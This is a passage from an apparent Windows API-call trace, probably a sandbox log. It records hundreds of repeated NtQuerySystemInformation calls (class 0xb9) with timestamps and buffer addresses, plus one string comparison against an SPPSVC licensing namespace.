ResultLength=0x0) [0303.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe170, Length=0x20, ResultLength=0x0) [0303.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe370, Length=0x38, ResultLength=0x0) [0303.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1f0, Length=0x20, ResultLength=0x0) [0303.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe180, Length=0x20, ResultLength=0x0) [0303.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe180, Length=0x20, ResultLength=0x0) [0303.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe440, Length=0x50, ResultLength=0x0) [0303.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe3c0, Length=0x28, ResultLength=0x0) [0303.832] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0303.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe440, Length=0x50, ResultLength=0x0) [0303.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe440, Length=0x50, ResultLength=0x0) [0303.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe440, Length=0x50, ResultLength=0x0) [0303.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe370, Length=0x38, ResultLength=0x0) [0303.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1a0, Length=0x28, ResultLength=0x0) [0303.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1a0, Length=0x28, ResultLength=0x0) [0303.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1a0, Length=0x28, ResultLength=0x0) [0303.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe210, Length=0x28, ResultLength=0x0) [0303.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe370, Length=0x38, ResultLength=0x0) [0303.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe290, Length=0x28, ResultLength=0x0) [0303.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe290, Length=0x28, ResultLength=0x0) [0303.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe370, Length=0x38, ResultLength=0x0) [0303.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1f0, Length=0x20, ResultLength=0x0) [0303.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe170, Length=0x20, ResultLength=0x0) [0303.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe170, Length=0x20, ResultLength=0x0) [0303.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe170, Length=0x20, ResultLength=0x0) [0303.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe370, Length=0x38, ResultLength=0x0) [0303.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1f0, Length=0x20, ResultLength=0x0) [0303.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe180, Length=0x20, ResultLength=0x0) [0303.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe180, Length=0x20, ResultLength=0x0) [0303.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0a0, Length=0x50, ResultLength=0x0) [0303.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0a0, Length=0x50, ResultLength=0x0) [0303.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0a0, Length=0x50, ResultLength=0x0) [0303.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf90, Length=0x50, ResultLength=0x0) [0303.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf90, Length=0x50, ResultLength=0x0) [0303.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf90, Length=0x50, ResultLength=0x0) [0303.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf90, Length=0x50, ResultLength=0x0) [0303.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdec0, Length=0x38, ResultLength=0x0) [0303.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcf0, Length=0x28, ResultLength=0x0) [0303.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcf0, Length=0x28, ResultLength=0x0) [0303.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcf0, Length=0x28, ResultLength=0x0) [0303.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcf0, Length=0x28, ResultLength=0x0) [0303.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd60, Length=0x28, ResultLength=0x0) [0303.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdec0, Length=0x38, ResultLength=0x0) [0303.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdde0, Length=0x28, ResultLength=0x0) [0303.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdde0, Length=0x28, ResultLength=0x0) [0303.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc80, Length=0x20, ResultLength=0x0) [0303.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x20, ResultLength=0x0) [0303.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x20, ResultLength=0x0) [0303.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x20, ResultLength=0x0) [0303.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdec0, Length=0x38, ResultLength=0x0) [0303.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdec0, Length=0x38, ResultLength=0x0) [0303.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd40, Length=0x20, ResultLength=0x0) [0303.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcd0, Length=0x20, ResultLength=0x0) [0303.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcd0, Length=0x20, ResultLength=0x0) [0303.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2f0, Length=0x50, ResultLength=0x0) [0303.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2f0, Length=0x50, ResultLength=0x0) [0303.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2f0, Length=0x50, ResultLength=0x0) [0303.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1e0, Length=0x50, ResultLength=0x0) [0303.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1e0, Length=0x50, ResultLength=0x0) [0303.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1e0, Length=0x50, ResultLength=0x0) [0303.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1e0, Length=0x50, ResultLength=0x0) [0303.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe110, Length=0x38, ResultLength=0x0) [0303.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf40, Length=0x28, ResultLength=0x0) [0303.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf40, Length=0x28, ResultLength=0x0) [0303.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf40, Length=0x28, ResultLength=0x0) [0303.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfb0, Length=0x28, ResultLength=0x0) [0303.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe110, Length=0x38, ResultLength=0x0) [0303.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe030, Length=0x28, ResultLength=0x0) [0303.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe030, Length=0x28, ResultLength=0x0) [0303.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe110, Length=0x38, ResultLength=0x0) [0303.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf90, Length=0x20, ResultLength=0x0) [0303.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf10, Length=0x20, ResultLength=0x0) [0303.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf10, Length=0x20, ResultLength=0x0) [0303.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf10, Length=0x20, ResultLength=0x0) [0303.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe110, Length=0x38, ResultLength=0x0) [0303.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf90, Length=0x20, ResultLength=0x0) [0303.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf20, Length=0x20, ResultLength=0x0) [0303.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf20, Length=0x20, ResultLength=0x0) [0303.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2f0, Length=0x50, ResultLength=0x0) [0303.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2f0, Length=0x50, ResultLength=0x0) [0303.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2f0, Length=0x50, ResultLength=0x0) [0303.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1e0, Length=0x50, ResultLength=0x0) [0303.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1e0, Length=0x50, ResultLength=0x0) [0303.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1e0, Length=0x50, ResultLength=0x0) [0303.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1e0, Length=0x50, ResultLength=0x0) [0303.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe110, Length=0x38, ResultLength=0x0) [0303.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf40, Length=0x28, ResultLength=0x0) [0303.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf40, Length=0x28, ResultLength=0x0) [0303.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf40, Length=0x28, ResultLength=0x0) [0303.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfb0, Length=0x28, ResultLength=0x0) [0303.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe110, Length=0x38, ResultLength=0x0) [0303.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe030, Length=0x28, ResultLength=0x0) [0303.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.914] NtQuerySystemInformation (SystemInformationClass=0xb9, 